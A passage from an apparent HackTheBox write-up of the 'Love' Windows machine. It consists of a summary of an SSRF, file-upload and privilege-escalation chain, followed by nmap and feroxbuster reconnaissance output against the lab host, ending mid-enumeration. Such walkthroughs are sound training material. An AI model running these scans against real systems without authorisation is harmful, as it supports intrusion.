xsspresso
Web · Easy · Windows

HTB — Love

SSRF on a voting system bypasses the firewall to reach an internal file analysis service. PHP file upload for RCE, AlwaysInstallElevated for SYSTEM.

January 16, 2025 · HackTheBox
#SSRF #File Upload #AlwaysInstallElevated #RCE

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.239
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 21:44 EST
Stats: 0:01:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 94.74% done; ETC: 21:45 (0:00:04 remaining)
Nmap scan report for 10.10.10.239
Host is up (0.024s latency).
Not shown: 62874 closed tcp ports (reset), 2642 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: Voting System using PHP
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   LANDesk-RC: 
|_    Host '10.10.14.6' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2025-01-17T03:10:30+00:00; +23m05s from scanner time.
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=1/16%Time=6789C415%P=x86_64-pc-linux-gnu%r
SF:(LANDesk-RC,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.6'\x20is\x20not\
SF:x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/16%OT=80%CT=1%CU=35530%PV=Y%DS=2%DC=T%G=Y%TM=6789
OS:C4BE%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%
OS:TS=U)SEQ(SP=107%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M53CNW8NNS
OS:%O2=M53CNW8NNS%O3=M53CNW8%O4=M53CNW8NNS%O5=M53CNW8NNS%O6=M53CNNS)WIN(W1=
OS:FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=
OS:M53CNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0
OS:%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z
OS:%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RI
OS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
 
Network Distance: 2 hops
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-time: 
|   date: 2025-01-17T03:10:20
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-01-16T19:10:19-08:00
|_clock-skew: mean: 2h23m05s, deviation: 4h00m02s, median: 23m04s
 
TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   23.96 ms 10.10.14.1
2   24.03 ms 10.10.10.239
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 200.65 seconds
 

80/tcp open http

sh
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: Voting System using PHP
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27

sh
feroxbuster --url http://10.10.10.239 
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.239
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       33w      299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       30w      302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       30w      338c http://10.10.10.239/images => http://10.10.10.239/images/
301      GET        9l       30w      337c http://10.10.10.239/admin => http://10.10.10.239/admin/
301      GET        9l       30w      340c http://10.10.10.239/includes => http://10.10.10.239/includes/
301      GET        9l       30w      339c http://10.10.10.239/plugins => http://10.10.10.239/plugins/
200      GET       16l       58w     4724c http://10.10.10.239/bower_components/jquery-slimscroll/jquery.slimscroll.min.js
200      GET       61l      106w     1568c http://10.10.10.239/plugins/iCheck/all.css
200      GET        8l       42w     1966c http://10.10.10.239/bower_components/datatables.net-bs/js/dataTables.bootstrap.min.js
200      GET       10l       80w     4516c http://10.10.10.239/plugins/iCheck/icheck.min.js
200      GET       14l      231w    14422c http://10.10.10.239/dist/js/adminlte.min.js
200      GET        4l       66w    31000c http://10.10.10.239/bower_components/font-awesome/css/font-awesome.min.css
200      GET        1l     1474w    41583c http://10.10.10.239/dist/css/skins/_all-skins.min.css
200      GET      164l     1143w    81906c http://10.10.10.239/bower_components/datatables.net/js/jquery.dataTables.min.js
200      GET        7l     1948w   106344c http://10.10.10.239/dist/css/AdminLTE.min.css
200      GET      476l     1907w    11197c http://10.10.10.239/bower_components/jquery/dist/core.js
200      GET        4l     1298w    86659c http://10.10.10.239/bower_components/jquery/dist/jquery.min.js
200      GET       12l       15w      174c http://10.10.10.239/bower_components/fastclick/bower.json
200      GET       22l      169w     1068c http://10.10.10.239/bower_components/fastclick/LICENSE
200      GET      841l     3207w    25965c http://10.10.10.239/bower_components/fastclick/lib/fastclick.js
200      GET        7l       12w    21778c http://10.10.10.239/bower_components/font-awesome/css/font-awesome.css.map
301      GET        9l       30w      337c http://10.10.10.239/Admin => http://10.10.10.239/Admin/
200      GET     2337l     3940w    37414c http://10.10.10.239/bower_components/font-awesome/css/font-awesome.css
200      GET       36l       53w      692c http://10.10.10.239/bower_components/datatables.net/bower.json
200      GET       20l      169w     1096c http://10.10.10.239/bower_components/datatables.net/License.txt
200      GET    10253l    40950w   268039c http://10.10.10.239/bower_components/jquery/dist/jquery.js
200      GET      349l     1562w    17298c http://10.10.10.239/dist/js/demo.js
200      GET       16l       96w     7493c http://10.10.10.239/dist/img/user6-128x128.jpg
200      GET        3l        4w      351c http://10.10.10.239/dist/img/default-50x50.gif
200      GET       22l      148w    14679c http://10.10.10.239/dist/img/avatar.png
200      GET       28l      149w    15048c http://10.10.10.239/dist/img/avatar2.png
200      GET      210l      745w     6064c http://10.10.10.239/dist/js/pages/dashboard.js
200      GET       20l      169w     1096c http://10.10.10.239/bower_components/datatables.net-bs/License.txt
200      GET       15l      108w     7429c http://10.10.10.239/images/facebook-profile-image.jpeg
200      GET       14l       29w     1199c http://10.10.10.239/images/index.jpeg
200      GET      184l      456w     4791c http://10.10.10.239/bower_components/datatables.net-bs/css/dataTables.bootstrap.css
200      GET        1l      112w     4188c http://10.10.10.239/bower_components/datatables.net-bs/css/dataTables.bootstrap.min.css
200      GET    15242l    64948w   445792c http://10.10.10.239/bower_components/datatables.net/js/jquery.dataTables.js
200      GET     1127l     2737w    27831c http://10.10.10.239/dist/js/adminlte.js
200      GET       22l       34w      403c http://10.10.10.239/bower_components/font-awesome/bower.json
200      GET        7l       56w      323c http://10.10.10.239/bower_components/font-awesome/HELP-US-OUT.txt
200      GET      301l      922w    11218c http://10.10.10.239/bower_components/jquery/AUTHORS.txt
200      GET       12l       47w      452c http://10.10.10.239/bower_components/font-awesome/less/core.less
200      GET       20l       47w      476c http://10.10.10.239/bower_components/font-awesome/less/stacked.less
200      GET       18l       49w      495c http://10.10.10.239/bower_components/font-awesome/less/font-awesome.less
200      GET        6l       15w      119c http://10.10.10.239/bower_components/font-awesome/less/fixed-width.less
200      GET       14l       19w      190c http://10.10.10.239/bower_components/jquery/bower.json
200      GET        6l       15w      120c http://10.10.10.239/bower_components/font-awesome/scss/_fixed-width.scss
200      GET       34l       67w      713c http://10.10.10.239/bower_components/font-awesome/less/animated.less
200      GET       60l      161w     1637c http://10.10.10.239/bower_components/font-awesome/scss/_mixins.scss
200      GET       19l       44w      378c http://10.10.10.239/bower_components/font-awesome/scss/_list.scss
200      GET      478l     1497w    14161c http://10.10.10.239/plugins/iCheck/icheck.js
200      GET       21l      171w     1085c http://10.10.10.239/bower_components/bootstrap/LICENSE
200      GET        5l       43w      425c http://10.10.10.239/bower_components/bootstrap/CHANGELOG.md
200      GET       43l       96w      903c http://10.10.10.239/bower_components/bootstrap/Gemfile.lock
200      GET       34l       59w      641c http://10.10.10.239/bower_components/bootstrap/bower.json
200      GET       89l      171w     2200c http://10.10.10.239/bower_components/bootstrap/package.json
200      GET       22l      135w     1143c http://10.10.10.239/bower_components/bootstrap/ISSUE_TEMPLATE.md
200      GET        6l       15w      127c http://10.10.10.239/bower_components/bootstrap/Gemfile
200      GET       32l       76w      964c http://10.10.10.239/bower_components/bootstrap/package.js
200      GET      511l     1200w    14386c http://10.10.10.239/bower_components/bootstrap/Gruntfile.js
200      GET      288l     1759w   139600c http://10.10.10.239/bower_components/font-awesome/fonts/fontawesome-webfont.woff2
200      GET       47l      399w    30342c http://10.10.10.239/plugins/iCheck/polaris/polaris@2x.png
200      GET        6l     1429w   121200c http://10.10.10.239/bower_components/bootstrap/dist/css/bootstrap.min.css
302      GET        0l        0w        0c http://10.10.10.239/login.php => index.php
200      GET       28l       72w     1292c http://10.10.10.239/bower_components/bootstrap/nuget/bootstrap.less.nuspec
200      GET        7l      432w    37045c http://10.10.10.239/bower_components/bootstrap/dist/js/bootstrap.min.js
200      GET       62l      136w     1645c http://10.10.10.239/plugins/iCheck/square/purple.css
200      GET        5l       19w     2102c http://10.10.10.239/dist/img/icons.png
200      GET       20l       88w     6046c http://10.10.10.239/dist/img/user4-128x128.jpg
200      GET        7l       53w     4847c http://10.10.10.239/dist/img/user1-128x128.jpg
200      GET       47l      265w    24361c http://10.10.10.239/dist/img/avatar04.png
200      GET       36l      242w     1605c http://10.10.10.239/bower_components/jquery/LICENSE.txt
301      GET        9l       30w      346c http://10.10.10.239/Admin/Includes => http://10.10.10.239/Admin/Includes/
200      GET       85l      241w     2206c http://10.10.10.239/plugins/pace/pace.css
200      GET      282l      740w     8486c http://10.10.10.239/plugins/bootstrap-slider/slider.css
200      GET      121l      293w     2780c http://10.10.10.239/plugins/timepicker/bootstrap-timepicker.css
200      GET        2l      210w    12507c http://10.10.10.239/plugins/pace/pace.min.js
200      GET       40l       76w      826c http://10.10.10.239/plugins/jvectormap/jquery-jvectormap-1.2.2.css
200      GET      935l     2880w    26566c http://10.10.10.239/plugins/pace/pace.js
200      GET        3l       47w     2226c http://10.10.10.239/plugins/bootstrap-wysihtml5/bootstrap3-wysihtml5.min.css
200      GET      117l      239w     2553c http://10.10.10.239/plugins/bootstrap-wysihtml5/bootstrap3-wysihtml5.css
200      GET       50l      121w     1576c http://10.10.10.239/plugins/input-mask/jquery.inputmask.phone.extensions.js
200      GET      169l      582w     9392c http://10.10.10.239/plugins/input-mask/jquery.inputmask.regex.extensions.js
200      GET      122l      410w     5315c http://10.10.10.239/plugins/input-mask/jquery.inputmask.extensions.js
200      GET     1452l     5977w   212322c http://10.10.10.239/bower_components/font-awesome/fonts/fontawesome-webfont.ttf
200      GET       78l      191w     2632c http://10.10.10.239/Admin/Includes/scripts.php
200      GET        0l        0w        0c http://10.10.10.239/Admin/Includes/conn.php
200      GET      126l      324w     4388c http://10.10.10.239/
200      GET     1203l     7516w   710884c http://10.10.10.239/dist/img/photo3.jpg
200      GET       27l      140w    11392c http://10.10.10.239/dist/img/user7-128x128.jpg
200      GET       34l      184w    16798c http://10.10.10.239/dist/img/avatar3.png
200      GET       20l      147w    11293c http://10.10.10.239/dist/img/user5-128x128.jpg
200      GET       33l      159w    12210c http://10.10.10.239/dist/img/user2-160x160.jpg
200      GET       20l       93w     8707c http://10.10.10.239/dist/img/user8-128x128.jpg
200      GET      156l     1018w    78571c http://10.10.10.239/dist/img/boxed-bg.png
301      GET        9l       30w      340c http://10.10.10.239/Includes => http://10.10.10.239/Includes/
200      GET        0l        0w        0c http://10.10.10.239/Includes/conn.php
200      GET        9l       21w      305c http://10.10.10.239/Includes/footer.php
200      GET       34l       79w     1168c http://10.10.10.239/Includes/scripts.php
200      GET        8l       46w      471c http://10.10.10.239/bower_components/bootstrap/nuget/MyGet.ps1
301      GET        9l       30w      337c http://10.10.10.239/ADMIN => http://10.10.10.239/ADMIN/
200      GET      182l      598w     4559c http://10.10.10.239/bower_components/datatables.net-bs/js/dataTables.bootstrap.js
200      GET        5l       24w     1938c http://10.10.10.239/dist/img/credit/visa.png
200      GET        1l       25w    12738c http://10.10.10.239/dist/css/alt/AdminLTE-bootstrap-social.min.css
200      GET        1l      128w     3621c http://10.10.10.239/dist/css/skins/skin-red-light.min.css
200      GET       22l       65w      994c http://10.10.10.239/Admin/Includes/votes_modal.php
200      GET       32l      103w     1013c http://10.10.10.239/bower_components/jquery-slimscroll/package.json
200      GET       37l      112w     1459c http://10.10.10.239/Includes/navbar.php
200      GET        6l       82w     5933c http://10.10.10.239/dist/img/user3-128x128.jpg
302      GET        4l       35w      370c http://10.10.10.239/Includes/session.php => index.php
200      GET      212l      476w     5991c http://10.10.10.239/bower_components/bootstrap/js/collapse.js
200      GET     1781l     5532w    48423c http://10.10.10.239/dist/css/skins/_all-skins.css
200      GET      488l     1679w    22814c http://10.10.10.239/plugins/input-mask/jquery.inputmask.date.extensions.js
200      GET      474l     1341w    13832c http://10.10.10.239/bower_components/jquery-slimscroll/jquery.slimscroll.js
200      GET       29l      164w    13759c http://10.10.10.239/dist/img/avatar5.png
200      GET        0l        0w        0c http://10.10.10.239/Includes/slugify.php
200      GET        4l       23w     2173c http://10.10.10.239/dist/img/credit/paypal2.png
200      GET        1l       40w     1863c http://10.10.10.239/plugins/pace/pace.min.css
200      GET        7l       38w     2787c http://10.10.10.239/dist/img/credit/mestro.png
200      GET      237l      667w     6075c http://10.10.10.239/bower_components/bootstrap/grunt/bs-lessdoc-parser.js
200      GET        7l       30w     2816c http://10.10.10.239/dist/img/credit/cirrus.png
200      GET       10l       42w     2822c http://10.10.10.239/dist/img/credit/mastercard.png
200      GET       18l       54w     3671c http://10.10.10.239/dist/img/credit/paypal.png
200      GET      152l      472w     4350c http://10.10.10.239/dist/css/skins/skin-yellow-light.css
200      GET       12l       58w     4319c http://10.10.10.239/dist/img/credit/american-express.png
200      GET     2671l    62869w   444379c http://10.10.10.239/bower_components/font-awesome/fonts/fontawesome-webfont.svg
200      GET        1l       29w     1469c http://10.10.10.239/dist/css/alt/AdminLTE-fullcalendar.min.css
200      GET       34l       78w      764c http://10.10.10.239/bower_components/bootstrap/less/close.less
200      GET       30l      106w      990c http://10.10.10.239/bower_components/bootstrap/grunt/bs-commonjs-generator.js
200      GET       82l      179w     1439c http://10.10.10.239/bower_components/bootstrap/grunt/sauce_browsers.yml
200      GET       57l      168w     2481c http://10.10.10.239/Includes/ballot_modal.php
200      GET      270l      637w     5651c http://10.10.10.239/bower_components/bootstrap/less/carousel.less
200      GET      134l      417w     3560c http://10.10.10.239/dist/css/skins/skin-yellow.css
200      GET       28l       72w     1270c http://10.10.10.239/bower_components/bootstrap/nuget/bootstrap.nuspec
200      GET       60l      231w     2813c http://10.10.10.239/Admin/Includes/navbar.php
200      GET      520l     1733w    16719c http://10.10.10.239/bower_components/bootstrap/js/tooltip.js
200      GET       44l      168w     1349c http://10.10.10.239/bower_components/bootstrap/grunt/bs-raw-files-generator.js
200      GET      155l      317w     3905c http://10.10.10.239/bower_components/bootstrap/js/tab.js
200      GET       64l      115w     1079c http://10.10.10.239/bower_components/bootstrap/less/labels.less
200      GET      165l      419w     4743c http://10.10.10.239/bower_components/bootstrap/js/dropdown.js
200      GET       73l      168w     1518c http://10.10.10.239/bower_components/bootstrap/less/alerts.less
200      GET       66l      147w     1199c http://10.10.10.239/bower_components/bootstrap/less/badges.less
200      GET       54l       95w      861c http://10.10.10.239/bower_components/bootstrap/less/pager.less
200      GET        1l      113w     3010c http://10.10.10.239/dist/css/skins/skin-green.min.css
200      GET       84l      195w     1387c http://10.10.10.239/bower_components/bootstrap/less/grid.less
200      GET        1l      128w     3719c http://10.10.10.239/dist/css/skins/skin-green-light.min.css
200      GET      109l      278w     2909c http://10.10.10.239/bower_components/bootstrap/grunt/change-version.js
200      GET      163l      500w     4533c http://10.10.10.239/dist/css/skins/skin-blue-light.css
200      GET        1l      128w     3768c http://10.10.10.239/dist/css/skins/skin-yellow-light.min.css
200      GET      152l      472w     4350c http://10.10.10.239/dist/css/skins/skin-purple-light.css
200      GET      161l      505w     4171c http://10.10.10.239/dist/css/skins/skin-black.css
200      GET        8l      267w    33323c http://10.10.10.239/plugins/jvectormap/jquery-jvectormap-1.2.2.min.js
200      GET        1l      128w     3768c http://10.10.10.239/dist/css/skins/skin-purple-light.min.css
200      GET        1l       47w     2732c http://10.10.10.239/dist/css/alt/AdminLTE-select2.min.css
200      GET        1l      113w     3055c http://10.10.10.239/dist/css/skins/skin-yellow.min.css
200      GET       26l       51w      594c http://10.10.10.239/bower_components/bootstrap/less/breadcrumbs.less
200      GET      100l      215w     3042c http://10.10.10.239/dist/css/alt/AdminLTE-select2.css
200      GET        1l      132w     3513c http://10.10.10.239/dist/css/skins/skin-black.min.css
200      GET       93l      207w     1820c http://10.10.10.239/dist/css/alt/AdminLTE-fullcalendar.css
200      GET      134l      417w     3419c http://10.10.10.239/dist/css/skins/skin-red.css
200      GET        1l      113w     3055c http://10.10.10.239/dist/css/skins/skin-purple.min.css
200      GET      134l      417w     3513c http://10.10.10.239/dist/css/skins/skin-green.css
200      GET      760l     1654w    15719c http://10.10.10.239/dist/css/alt/AdminLTE-bootstrap-social.css
200      GET       13l     1743w   240427c http://10.10.10.239/plugins/jQueryUI/jquery-ui.min.js
200      GET      869l     2256w    27472c http://10.10.10.239/bower_components/bootstrap/less/variables.less
200      GET     1576l     4565w    51062c http://10.10.10.239/plugins/bootstrap-slider/bootstrap-slider.js
301      GET        9l       30w      364c http://10.10.10.239/bower_components/ion.rangeSlider => http://10.10.10.239/bower_components/ion.rangeSlider/
301      GET        9l       30w      358c http://10.10.10.239/bower_components/morris.js => http://10.10.10.239/bower_components/morris.js/
301      GET        9l       30w      357c http://10.10.10.239/bower_components/chart.js => http://10.10.10.239/bower_components/chart.js/
200      GET        7l     1565w    73837c http://10.10.10.239/dist/css/alt/AdminLTE-without-plugins.min.css
200      GET     4002l    10515w    90151c http://10.10.10.239/dist/css/alt/AdminLTE-without-plugins.css
200      GET     2679l     5252w    93626c http://10.10.10.239/bower_components/bootstrap/grunt/npm-shrinkwrap.json
200      GET        1l        2w   104583c http://10.10.10.239/bower_components/jquery/dist/jquery.slim.min.map
200      GET        4l     1058w    69597c http://10.10.10.239/bower_components/jquery/dist/jquery.slim.min.js
200      GET        1l      961w   144313c http://10.10.10.239/plugins/jvectormap/jquery-jvectormap-world-mill-en.js
200      GET       78l      191w     2632c http://10.10.10.239/ADMIN/includes/scripts.php
200      GET       22l       65w      994c http://10.10.10.239/ADMIN/includes/votes_modal.php
200      GET        0l        0w        0c http://10.10.10.239/ADMIN/includes/conn.php
200      GET        6l       15w      230c http://10.10.10.239/ADMIN/includes/footer.php
200      GET       71l      208w     3593c http://10.10.10.239/ADMIN/includes/profile_modal.php
200      GET      100l      251w     4509c http://10.10.10.239/ADMIN/includes/positions_modal.php
200      GET       60l      231w     2813c http://10.10.10.239/ADMIN/includes/navbar.php
200      GET       64l      229w     3310c http://10.10.10.239/ADMIN/includes/menubar.php
200      GET       31l       94w     1551c http://10.10.10.239/ADMIN/includes/config_modal.php
200      GET      152l      472w     4197c http://10.10.10.239/dist/css/skins/skin-red-light.css
200      GET       94l      209w     2284c http://10.10.10.239/bower_components/bootstrap/js/alert.js
200      GET     5673l    14551w   128974c http://10.10.10.239/dist/css/AdminLTE.css
200      GET        1l        7w   131666c http://10.10.10.239/bower_components/jquery/dist/jquery.min.map
200      GET      486l     3203w   220438c http://10.10.10.239/dist/img/boxed-bg.jpg
200      GET        3l       19w      144c http://10.10.10.239/bower_components/jquery-sparkline/minheader.txt
200      GET      426l     1804w    15014c http://10.10.10.239/bower_components/eve-raphael/eve.js
200      GET       66l      165w     1685c http://10.10.10.239/bower_components/eve-raphael/e.html
200      GET       13l       23w      233c http://10.10.10.239/bower_components/eve-raphael/component.json
200      GET       18l       37w      390c http://10.10.10.239/bower_components/eve-raphael/package.json
200      GET       17l       28w      326c http://10.10.10.239/bower_components/eve-raphael/bower.json
200      GET      202l     1580w    11356c http://10.10.10.239/bower_components/eve-raphael/LICENSE
200      GET       17l       27w      338c http://10.10.10.239/bower_components/jquery-sparkline/bower.json
200      GET       41l       73w     1084c http://10.10.10.239/bower_components/jquery-sparkline/Makefile
200      GET        1l        1w        6c http://10.10.10.239/bower_components/jquery-sparkline/version.txt
200      GET       34l       63w      952c http://10.10.10.239/bower_components/jquery-sparkline/sparkline.jquery.json
200      GET       20l       24w      292c http://10.10.10.239/bower_components/mocha/bower.json
200      GET       22l      171w     1103c http://10.10.10.239/bower_components/mocha/LICENSE
200      GET      270l      549w     4242c http://10.10.10.239/bower_components/mocha/mocha.css
200      GET      149l      373w     6830c http://10.10.10.239/ADMIN/includes/voters_modal.php
200      GET       40l       76w     1485c http://10.10.10.239/bower_components/inputmask/bower.json
200      GET      324l     1677w    10311c http://10.10.10.239/bower_components/jquery-sparkline/Changelog.txt
200      GET       71l      149w     1689c http://10.10.10.239/bower_components/jquery-ui/package.json
200      GET      654l     2979w    20415c http://10.10.10.239/bower_components/mocha/History.md
200      GET    14975l    50670w   566620c http://10.10.10.239/plugins/bootstrap-wysihtml5/bootstrap3-wysihtml5.all.js
200      GET       69l      163w     2083c http://10.10.10.239/bower_components/jquery-ui/composer.json
200      GET      284l      883w    10759c http://10.10.10.239/bower_components/jquery-ui/AUTHORS.txt
200      GET       12l       18w      151c http://10.10.10.239/bower_components/jquery-ui/bower.json
200      GET       13l       21w      221c http://10.10.10.239/bower_components/jquery-ui/component.json
200      GET       44l      271w     1827c http://10.10.10.239/bower_components/jquery-ui/LICENSE.txt
200      GET    16617l    60375w   470596c http://10.10.10.239/plugins/jQueryUI/jquery-ui.js
200      GET       22l      169w     1075c http://10.10.10.239/bower_components/moment/LICENSE
200      GET       19l       48w      462c http://10.10.10.239/bower_components/select2/component.json
200      GET       56l      349w     2154c http://10.10.10.239/bower_components/bootstrap-timepicker/CHANGELOG.md
200      GET       20l      165w     1041c http://10.10.10.239/bower_components/bootstrap-timepicker/LICENSE
200      GET       35l       55w      833c http://10.10.10.239/bower_components/bootstrap-timepicker/bower.json
200      GET       20l      167w     1053c http://10.10.10.239/bower_components/fullcalendar/LICENSE.txt
200      GET      127l      612w     4594c http://10.10.10.239/bower_components/fullcalendar/CONTRIBUTING.md
200      GET       41l       71w      852c http://10.10.10.239/bower_components/fullcalendar/bower.json
200      GET        8l     2944w   210932c http://10.10.10.239/plugins/bootstrap-wysihtml5/bootstrap3-wysihtml5.all.min.js
200      GET     1433l     8653w   763662c http://10.10.10.239/dist/img/photo2.png
200      GET       25l       29w      422c http://10.10.10.239/bower_components/moment/bower.json
200      GET       13l       39w      384c http://10.10.10.239/bower_components/select2/bower.json
200      GET       25l       45w      522c http://10.10.10.239/bower_components/select2/composer.json
200      GET       73l      143w     1758c http://10.10.10.239/bower_components/select2/package.json
200      GET      369l      787w    13199c http://10.10.10.239/bower_components/bootstrap-daterangepicker/demo.html
200      GET      712l     2073w    20497c http://10.10.10.239/bower_components/moment/moment.d.ts
200      GET       21l      176w     1124c http://10.10.10.239/bower_components/select2/LICENSE.md
200      GET      254l     1836w    20532c http://10.10.10.239/bower_components/select2/CHANGELOG.md
301      GET        9l       30w      363c http://10.10.10.239/bower_components/jquery-knob/js => http://10.10.10.239/bower_components/jquery-knob/js/
200      GET       22l       35w      431c http://10.10.10.239/bower_components/bootstrap-slider/bower.json
200      GET       32l       69w      873c http://10.10.10.239/bower_components/select2/select2.jquery.json
200      GET       86l      148w     2019c http://10.10.10.239/bower_components/PACE/install.json
200      GET       35l       52w      653c http://10.10.10.239/bower_components/PACE/bower.json
200      GET       43l      207w    15077c http://10.10.10.239/bower_components/bootstrap-slider/locks.png
200      GET      140l      145w   306319c http://10.10.10.239/dist/css/adminlte.min.css.map
200      GET      178l      470w     4787c http://10.10.10.239/bower_components/bootstrap-slider/slider.css
200      GET       11l       19w      154c http://10.10.10.239/bower_components/Flot/package.json
200      GET      427l     1080w    12038c http://10.10.10.239/bower_components/bootstrap-slider/bootstrap-slider.js
200      GET       12l       35w      285c http://10.10.10.239/bower_components/Flot/Makefile
200      GET      180l      582w     6151c http://10.10.10.239/bower_components/Flot/jquery.colorhelpers.js
200      GET       27l       74w      837c http://10.10.10.239/bower_components/Flot/flot.jquery.json
200      GET      820l     3071w    23809c http://10.10.10.239/bower_components/Flot/jquery.flot.pie.js
200      GET       75l      566w     3237c http://10.10.10.239/bower_components/Flot/FAQ.md
200      GET       22l      169w     1069c http://10.10.10.239/bower_components/Flot/LICENSE.txt
200      GET      176l      569w     5419c http://10.10.10.239/bower_components/Flot/jquery.flot.crosshair.js
200      GET      432l     1649w    11768c http://10.10.10.239/bower_components/Flot/jquery.flot.time.js
200      GET        8l       14w      114c http://10.10.10.239/bower_components/Flot/component.json
200      GET       71l      330w     2505c http://10.10.10.239/bower_components/Flot/jquery.flot.symbol.js
200      GET      241l      941w     7360c http://10.10.10.239/bower_components/Flot/jquery.flot.image.js
200      GET      143l      685w     4340c http://10.10.10.239/bower_components/Flot/PLUGINS.md
200      GET      190l      683w     6033c http://10.10.10.239/bower_components/Flot/jquery.flot.categories.js
